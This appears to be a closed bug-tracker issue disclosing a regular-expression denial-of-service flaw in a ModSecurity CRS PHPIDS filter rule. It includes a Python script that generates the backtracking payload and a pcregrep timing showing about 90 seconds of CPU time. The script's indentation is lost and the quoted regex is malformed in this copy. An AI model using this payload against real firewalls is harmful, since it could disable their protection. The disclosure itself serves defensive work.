Closed
Description
MODSEC-119: The first rule of the modsecurity_crs_41_phpids_filters.conf file called
"Possible RegEx DoS Payload", is (ironically) vulnerable to a denial of
service. The following python script generate a string of 71875 bytes,
which is not matched by the pattern:
!/usr/bin/env python
n = 32
s = 'aa'
buf = s
x = 'b'
for i in range(0, 3):
for j in range(0, n-1):
buf += s
buf += s[:-1] + x
x = chr(ord(x) + 1)
s = buf
print buf
This string takes a lot of time to not be matched by the libcpre:
% ./redos.py | time pcregrep '(?.{2,})\1{32,})'
81,22s user 0,03s system 89% cpu 1:30,67 total
Metadata
Metadata
Assignees
Labels
No labels